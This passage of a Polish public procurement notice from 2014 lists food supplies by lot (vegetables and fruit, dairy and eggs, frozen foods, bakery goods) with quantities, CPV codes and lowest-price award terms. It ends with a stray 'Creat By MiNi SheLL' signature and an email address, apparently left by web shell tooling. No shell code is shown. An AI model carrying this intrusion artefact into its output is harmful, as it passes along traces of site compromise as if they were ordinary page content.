9	Pietruszka	kg			250
10	Pieczarka	kg			220
11	Por	szt.			100
12	Seler	kg			220
13	Sałata zielona	szt.			100
14	Papryka czerwona	kg			60
15	Ziemniaki	kg			6000
16	Fasola Jaś sucha	kg			200
17	Ogórki	kg			200
18	Pomidory	kg			130
19	Kapusta biała	kg			500
20	Kapusta pekińska	kg			100
21	Kapusta czerwona	kg			200
22	Rabarbar	kg			20
23	Truskawka	kg			70
24	Borówka	kg			70
25	Wiśnie	kg			150
26	Szczypiorek	szt.			80
27	Cytryna	kg			80
28	Porzeczka czarna	kg			150
29	Sałata lodowa	szt.			60
30	Rzodkiewka pęczek	szt.			60
31	Śliwa węgierka	kg			50
32	Brokuły	szt.			120
33	Ogórki pakowane kiszone 0,4 kg	szt.			250
34	Kapusta kiszona	kg			300
35	Botwinka	szt.			60
36	Ziemniaki młode	kg			600
37	Kapusta młoda	szt.			200
38	Żurek w butelce 	szt.			200
39	Brzoskwinie	kg			30
40	Gruszki	kg			250
41	Nektaryna	kg			25
42	Pomarańcze	kg			100
43	Kiwi	szt.			500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Mleko i produkty mleczarskie. Jaja..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 2% woreczek 0,9 l	szt.			1500
Drożdże 100g	szt.			60
Ser biały 3x mielony 600g	szt.			700
Śmietana 30% 0,5l	szt.			100
Śmietana 18% 0,4l  bez skrobi modyfikowanej	szt.			3000
Masło extra 200g,  min.82% tłuszczu	szt.			2000
Jogurt pitny owocowy 250g	szt.			4000
Ser żółty 45% plastry, pakowany	kg			15
Deser mleczno-czekoladowy 55g	szt.			1500
Jogurt owocowy, zawartość owoców min. 9%, 150g.	szt.        700
Jogurt owocowy min. 115g.	szt.			700
Ser żółty 45% tł.	kg			80
Ser biały w kostce tłusty	kg			50
Serek owocowy homogen. min 150g	szt.			150
Napój mleczny owocowy min. 180g.	szt.			2500
jaja świeże, duże  L	szt.			10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Ryby mrożone. Lody. Mrożonki owocowe i warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z dorsza mrożony, płaty	kg			600
Lody śmiet. - owocowe kubek 200ml.	szt.			1000
Kalafior mrożony 2,5kg	szt.			60
Fasolka szparagowa mrożona 2,5kg	szt.			30
Brokuły mrożone 2,5kg.	szt.			50
Brukselka mrożona 2,5kg	szt.			50
Groszek mrożony zielony 2,5kg	szt.			8
Marchewka z groszkiem mrożona 2,5kg	szt.			70
Truskawki mrożone 2,5kg	szt.			10
Mieszanka kompotowa mrożona 2,5kg	szt.			150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.10.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Pieczywo świeże, wyroby piekarskie i ciastkarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb ziarnisty 600g	szt.			180
Bułka 100g	szt.			600
Bułka tarta	kg			200
Chleb pszenno-żytni 600g	szt.			100
Pączki z marmoladą	szt.			300
Bułka kajzerka	szt.			1200
Weka	szt.			100
Chleb żytni 600g	szt.			50
Drożdżówka	szt.			300
Mufinka	szt.			500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.10.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com